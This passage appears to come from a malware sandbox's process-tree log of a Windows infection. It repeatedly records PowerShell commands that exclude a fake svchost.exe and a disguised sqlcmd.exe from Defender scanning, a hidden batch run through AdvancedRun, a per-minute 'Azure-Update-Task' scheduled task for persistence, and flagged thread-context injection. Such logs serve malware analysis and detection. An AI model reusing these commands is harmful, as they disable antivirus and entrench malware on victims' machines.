    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7468
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5356
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6688
- - C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:5896
  - - C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\AdvancedRun.exe" /SpecialRun 4101d8 5896
      4⤵
      PID:7956
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3724
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:7116
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:2232
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:7076
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7388
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8100
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7536
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8076
- - C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:7836
  - - C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\AdvancedRun.exe" /SpecialRun 4101d8 7836
      4⤵
      PID:5296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5612
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:3844
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:4340
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5356
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6528
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6936
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6780
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6516
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5512
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7528
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6580
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7768
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4112
- - C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:4608
  - - C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\AdvancedRun.exe" /SpecialRun 4101d8 4608
      4⤵
      PID:7152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6928
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:4676
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:660
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:2716
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5608
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6468
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6488
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7612
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5868
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6976
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
